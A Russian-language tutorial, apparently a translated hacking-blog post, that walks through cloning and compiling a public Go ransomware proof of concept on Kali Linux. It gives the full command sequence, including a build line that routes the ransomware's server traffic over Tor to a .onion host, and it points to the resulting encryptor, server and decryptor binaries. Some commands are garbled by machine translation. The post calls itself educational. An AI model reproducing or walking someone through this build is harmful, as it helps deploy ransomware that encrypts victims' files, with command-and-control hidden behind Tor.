Программы-вымогатели — это быстрорастущая угроза цифровой безопасности, представляющая значительный риск для компаний и даже целых стран. Недавний всплеск новых вариантов программ-вымогателей, таких как Snake, специально предназначенных для систем SCADA/ICS, подчеркивает опасность, которую программы-вымогатели представляют для критической инфраструктуры. Поскольку разработчики программ-вымогателей продолжают развиваться и становиться все более изощренными, важно, чтобы организации принимали упреждающие меры для защиты своих систем и данных.

Чтобы лучше понять, как работает программа-вымогатель, давайте создадим собственную программу-вымогатель на основе Proof of Concept (POC), доступного на сайте mauri870 на github.com. Он разработал эту программу-вымогатель в рамках своей академической программы, и она предназначена не для вредоносных целей, а скорее для того, чтобы помочь нам понять, как работает программа-вымогатель. Подобно новому варианту Snake и растущему числу вредоносных программ, эта вредоносная программа написана на Golang.

Это вредоносное ПО шифрует файлы в фоновом режиме с помощью AES-256-CTR и использует RSA-4096 для защиты обмена данными с сервером. Эта программа-вымогатель очень похожа на Cryptolocker, одну из самых успешных атак программ-вымогателей в истории.

Шаг № 1: Загрузите и установите двоичные файлы

Первый шаг — запустить Kali и убедиться, что golang установлен. Если нет, загрузите его из репозиториев Kali, введя;

kali › sudo apt install golang

Далее вам нужно будет войти в систему под пользователем root.

кали › судо су -

Теперь создайте каталог для двоичных файлов. В данном случае я назвал его просто «git».

kali ›mkdir git

Затем измените каталог (cd) на этот каталог.

kali › cd git

Затем загрузите бинарники с github.com.

kali › git clone https://github.com/mauri870/ransomware

Шаг № 2: Экспорт переменных среды GO

Затем нам нужно установить некоторые переменные среды, чтобы направить двоичные файлы и GO в соответствующие каталоги.

Шаг № 3: Сделайте зависимости исходного кода

Теперь, когда переменные установлены и экспортированы, нам нужно сделать зависимости. Перейдите в новый каталог ransomware и введите make deps.

программа-вымогатель kali › cd

kali › сделай депс

Шаг № 4: Создайте исходный код с параметрами

Теперь, когда мы завершили сборку deps, мы можем приступить к созданию исходного кода. В нашем случае мы будем использовать несколько вариантов.

Во-первых, мы хотим использовать ToR для шифрования наших коммуникаций по сети ToR.

USE_TOR=true

Во-вторых, мы хотим использовать наш темный веб-сервер по адресу hackersarisegtdj.onion (вы можете использовать любой домен или локальный хост).

SERVER_HOST=hackersarisegtdj.onion

В-третьих, мы хотим использовать порт 80 (вы можете использовать любой порт).

SERVER_PORT=80

Наконец, мы хотим настроить операционную систему на компиляцию исходного кода для нашей операционной системы, в данном случае Linux.

GOOS=linux

Наша команда должна выглядеть примерно так;

kali › make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux

Теперь нажмите ENTER и наблюдайте за компиляцией программы-вымогателя.

Шаг № 5. Проверьте каталог на наличие ransomware.exe

После того, как исходный код будет сгенерирован, сделайте длинный список в каталоге программ-вымогателей.

калий › ls -l

Теперь перейдите в каталог bin.

kali › cd bin

Здесь вы увидите программу-вымогатель.exe, сервер и файл разблокировки.exe.

Шаг № 6. Изучите типы файлов, которые необходимо зашифровать

Если вы хотите узнать, какие типы файлов будет шифровать эта программа-вымогатель, перейдите в каталог cmd и откройте common.go.

kali › cd cmd

kali › more common.go

Здесь вы можете увидеть расширения файлов, которые эта программа-вымогатель будет шифровать при запуске.

Краткое содержание

На данный момент программы-вымогатели, вероятно, представляют собой наибольшую угрозу для наших цифровых систем. Как ясно продемонстрировала атака Colonial Pipeline, почти все уязвимы, и если системы SCADA/ICS будут скомпрометированы, это может привести к значительным экономическим и инфраструктурным последствиям!

Этот POC программы-вымогателя поможет вам лучше понять программу-вымогатель как угрозу и проверить, уязвимы ли ваши системы для такой атаки.

Во второй части этой серии мы протестируем эту программу-вымогатель на виртуальной машине Windows.